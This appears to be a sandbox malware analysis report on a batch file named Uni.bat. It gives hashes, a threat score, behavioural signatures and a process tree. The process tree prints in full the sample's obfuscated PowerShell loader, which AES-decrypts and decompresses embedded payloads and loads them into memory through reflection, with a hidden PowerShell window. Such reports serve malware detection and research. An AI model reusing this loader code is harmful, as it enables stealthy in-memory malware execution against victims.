Analysis
-
max time kernel
121s -
max time network
122s -
platform
windows7_x64 -
resource
win7-20240611-en -
resource tags
arch:x64arch:x86image:win7-20240611-enlocale:en-usos:windows7-x64system -
submitted
01-07-2024 16:35
Static task
static1
Behavioral task
behavioral1
Sample
Uni.bat
Resource
win7-20240611-en
windows7-x64
4 signatures
150 seconds
General
-
Target
Uni.bat
-
Size
586KB
-
MD5
3a43120a8dd1e42ff894670710bd8bc4
-
SHA1
dbb9244231da204517f5d7a0e5ca713b64a3c175
-
SHA256
b3db27588a80527cb09b85476ed59ce698dc9a4b6b03246160de944ecc5ca79d
-
SHA512
15931135fd1fec93a3d77e0f28a19ca0780e7de34ab6a4f8174999cf534b4f810ace2bba0db3f2d0d0007199771b16d0c2bc3cdee48ef00a19be4705d3c26026
-
SSDEEP
12288:qAtzNGPPmXaudwDKHYeRfRJUnYNY+yjOc3zRMh0KYQgrR3dih:3BsXvudwG4eR5yN6c3VS0KZ9
Score
8/10
Malware Config
Signatures
-
Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs
Run Powershell and hide display window.
pid Process 1892 powershell.exe -
Suspicious behavior: EnumeratesProcesses 1 IoCs
pid Process 1892 powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
description pid Process Token: SeDebugPrivilege 1892 powershell.exe -
Suspicious use of WriteProcessMemory 6 IoCs
description pid Process procid_target PID 352 wrote to memory of 380 352 cmd.exe 29 PID 352 wrote to memory of 380 352 cmd.exe 29 PID 352 wrote to memory of 380 352 cmd.exe 29 PID 352 wrote to memory of 1892 352 cmd.exe 30 PID 352 wrote to memory of 1892 352 cmd.exe 30 PID 352 wrote to memory of 1892 352 cmd.exe 30
Processes
-
C:\Windows\system32\cmd.execmd /c "C:\Users\Admin\AppData\Local\Temp\Uni.bat"1⤵
- Suspicious use of WriteProcessMemory
PID:352 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('OYi6jovj9grd+OhQ3Yq9CKyYEolqR3DCnwhMoiMIiic='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('x758XCMTdc4jhHfAjXEAbQ=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $PTonT=New-Object System.IO.MemoryStream(,$param_var); $pteGk=New-Object System.IO.MemoryStream; $QeYIq=New-Object System.IO.Compression.GZipStream($PTonT, [IO.Compression.CompressionMode]::Decompress); $QeYIq.CopyTo($pteGk); $QeYIq.Dispose(); $PTonT.Dispose(); $pteGk.Dispose(); $pteGk.ToArray();}function execute_function($param_var,$param2_var){ $imxQj=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $oCBDZ=$imxQj.EntryPoint; $oCBDZ.Invoke($null, $param2_var);}$bxwFd = 'C:\Users\Admin\AppData\Local\Temp\Uni.bat';$host.UI.RawUI.WindowTitle = $bxwFd;$spiDd=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($bxwFd).Split([Environment]::NewLine);foreach ($urTOm in $spiDd) { if ($urTOm.StartsWith('VUGwKkMvYCOpuHkPGxtm')) { $jdwUC=$urTOm.Substring(20); break; }}$payloads_var=[string[]]$jdwUC.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0].Replace('#', '/').Replace('@', 'A'))));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1].Replace('#', '/').Replace('@', 'A'))));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] ('')); "2⤵PID:380
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1892
-